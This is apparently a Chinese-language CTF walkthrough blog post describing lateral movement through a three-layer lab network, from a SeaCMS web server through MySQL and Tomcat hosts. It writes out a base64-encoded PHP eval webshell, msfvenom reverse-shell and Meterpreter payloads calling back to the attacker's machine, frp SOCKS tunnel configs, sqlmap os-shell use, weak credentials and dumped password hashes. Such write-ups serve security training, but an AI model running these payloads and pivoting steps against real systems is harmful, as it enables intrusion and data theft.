最近真的很忙,老板不仅要我们加班,还不给钱,整天吹嘘996是福报,我已经决定要跳槽了,我觉得以后去当红队打hvv也不错。要么就去渗透,要么安fu,反正是真的不想在这种垃圾公司荒废人生了……我最近了一个工控的ctf,一个百度安全比赛,还有就是这个,这个只能kali,就很限制,环境我准备的很不好……只给了2个提示,1.要从10.2.2.97进去,2.最后是一个三层网络8个flag要拿下dc,flag其实还是次要的,主要是dc.恶心的地方是,这个网有自重启动和防护能力,每过一段时间刷新后门全部没掉……所以免杀和安防还有规避检测花了很大功夫……
一、外网打点
先用oopenconnect连接进去
分配本机IP:
Password:
POST https://183.129.189.62:4434/auth
得到了 CONNECT 响应:HTTP/1.1 200 CONNECTED
CSTP 已连接。DPD 90,持久连接(Keepalive)32400
Connected as 10.2.1.83, using SSL, with DTLS in progress
DTLS 握手失败:资源临时不可用,请重试。
nmap扫描,发现10.2.2.97开着22和80,hydra爆破不出来22,访问80,发现是海洋cms
whatweb 10.2.2.97
http://10.2.2.97 [200 OK] Apache[2.4.7], Bootstrap[3.3.5], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.2.2.97], JQuery[1.11.3], PHP[5.5.9-1ubuntu4.25], Script, Title[海洋CMS], X-Powered-By[PHP/5.5.9-1ubuntu4.25], X-UA-Compatible[IE=edge]
找了很多海洋cms的漏洞利用,这篇文章不错:
Seacms漏洞_Grey的博客-CSDN博客_seacms漏洞
探测信息发现了很奇怪的信息,怀疑做了反向代理,因为ifconfig测出来ip不是10.2.2.97,而是10.20.20.31
拿下一个flag:
开始写shell,发现貌似system(‘echo(一句话木马)>shell.PHP’)写不进去,然后想着是nc或者wget,sc下载本地msf木马,但是貌似不太行,那只能写shell了。听大表哥说是6.53版本限制了rce的长度,一般用这两个方法写shell:
说实话下图这个poc我是真的想不到
华丽的分割线——————————————————————————
由于网络变化,本机IP变为10.2.0.19 ,第一个目标变为10.2.2.16
我这里用的是第一张图片写的shell,发现居然之前大表哥可以我不行……果然自己还是菜鸡用echo写吧(o(╥﹏╥)o)。写shell如下:
蚁剑连接getshell:居然返回数据为空!!!!!我惊呆了,明明已经写进去一句话木马了呀!检查之后发现post函数被过滤了!我tm居然这里有个waf!那怎么办?绕过呗。。。参考:
渗透tip-----命令执行写入webshell - Shadown-PQ - 博客园
echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.PHP
二、第一层内网横移10.10.20
基本信息收集
当前ip是10.10.20.31,(网络变化了所以ip变动,这次我确信是反向代理了,本地还开了3306,但是外网nmap扫不到,可能是白名单了或者waf,ps查看进程发现没什么杀软貌似……)
msf反弹shell进去(有条件可以免杀)
msfvenom -p linux/x64/shell/reverse_tcp lhost=10.2.0.19 lport=4444 -f elf -o shell
use exploit/multi/handler
第一次生成shell无法得到交互式meterpreter,换payload继续:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.2.0.19 LPORT=4445 -f elf > shell2.elf
Active sessions
===============No active sessions.
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.2.0.19
lhost => 10.2.0.19
msf5 exploit(multi/handler) > set lport 4445
lport => 4445
msf5 exploit(multi/handler) >run
派生到cs,但是猛然发现cs上线linux主机比较麻烦……frpc流量特征明显,于是想着直接免杀fscan扫描……
fscan -h 10.10.20.0/24 很好这个时候又无回显,存到一个txt里面吧! -o 1.txt
然后动作太大(或许是网络原因),链接断了,我想不会我被发现了吧!
10.10.20.1:80 open
10.10.20.1:22 open
10.10.20.31:80 open
10.10.20.166:3306 open
10.10.20.100:80 open
10.10.20.231:3306 open
10.10.20.88:8009 open
10.10.20.88:8080 open
[+] MysqL:10.10.20.166:3306:root 123456
[+] MysqL:10.10.20.231:3306:root 123456
[*] WebTitle:http://10.10.20.1 code:200 len:9 title:海洋CMS
[*] WebTitle:http://10.10.20.31 code:200 len:9 title:海洋CMS
[*] WebTitle:http://10.10.20.100 code:200 len:12 title:后台系统
[*] WebTitle:http://10.10.20.88:8080 code:200 len:20 title:Apache Tomcat/8.0.43
发现2台机子有点意思:
[+] MysqL:10.10.20.166:3306:root 123456
[+] MysqL:10.10.20.231:3306:root 123456
直接访问不通,这个时候只能代理了……
frpc的两个配置文件如下:
[common]
bind_addr = 0.0.0.0
bind_port = 7000
dashboard_addr = 0.0.0.0
dashboard_port = 7001
dashboard_user = root
dashboard_pwd = 123456
token = 00253c8fcf9ae01
frpc
[common]
server_addr = 10.2.0.19
server_port = 7000
token = 00253c8fcf9ae01
pool_count = 5
health_check_type = tcp
health_check_interval_s = 100
[test]
remote_port = 12345
plugin = socks5
use_encryption = true
use_compression = true
plugin_user = admin
plugin_passwd = 123456
proxychains设置
nmap验证代理是否有效:有效3306开了
cobaltstrike-4.3$ proxychains nmap 10.10.20.166
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 18:45 CST
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:80-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:587-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:8080-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:143-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:53-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:554-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:1720-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:3306-<><>-OK
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:445-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:113-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:995-<--timeout
代理MysqL无痕登录10.10.20.231 MysqL -h localhost -u root -p
发现root的密码hash,破解之:
MysqL [MysqL]> select * from user;
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string |
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| localhost | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| 9d231610406a | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| 127.0.0.1 | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| ::1 | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| localhost | | | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | NULL |
| 9d231610406a | | | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | NULL |
| % | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | NULL |
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
7 rows in s__H__
___ ___[']_____ ___ ___ {
sqlmap -d getshell的方法:[猥琐姿势]利用MySQL的root账号从而快速GetShell - 知乎
proxychains sqlmap -d "MysqL://root:123456@10.10.20.231:3306/MysqL" -f
[*] starting @ 19:12:24 /2021-11-04/
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.231:3306-<><>-OK
[19:12:30] [INFO] connection to MysqL server '10.10.20.231:3306' established
[19:12:30] [INFO] testing MysqL
[19:12:30] [INFO] resumed: [['1']]...
[19:12:30] [INFO] confirming MysqL
[19:12:30] [INFO] resumed: [['1']]...
[19:12:31] [INFO] the back-end DBMS is MysqL
[19:12:31] [INFO] actively fingerprinting MysqL
[19:12:32] [INFO] executing MysqL comment injection fingerprint
back-end DBMS: active fingerprint: MysqL >= 5.5
comment injection fingerprint: MysqL 5.5.23
[19:12:47] [INFO] connection to MysqL server '10.10.20.231:3306' closed
版本5.5.23的MysqL,进去后发现权限低的可怜MysqL权限,想着能不能提权udf或者mof,但是在/tmp下就有一个flag8.txt
---
os-shell> ls /tmp
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
flag8.txt
MysqL.sock
---
os-shell> cat /tmp/flag8.txt
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: '14326d7730ff9838e1e5e2a778028356'
Mysql-UDF提权_告白的博客-CSDN博客_udf提权
弱口令就是tomcat,密码是TOMCAT123,实在是懒得手动提权了,大表哥直接人工给密码
现在最恶心的地方到了!
我居然无法用proxychains代理火狐!别的curl,nmap都可以,就是火狐不行,就算浏览器手动设置了socks5代理走12345端口,也无法访问tomcat的10.10.20.88:8080,那么我该如何拿到10.10.20.88的shell呢??就离谱,离大普……一模一样的步骤和环境……唉……
三、第二层内网核心区域
打下tomacat之后,二级代理,进入后用nmap扫描,这次就相对没有那么恶心了,普通的内网主机攻击思路,因为各种原因,最后一层的内网不能再写了,,先这样子,,整理思路:
kali------->cms(DMZ)------>MysqL(内网1发现密码)---->tomcat(内网1)------->winserver(内网2拿到最终答案)
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。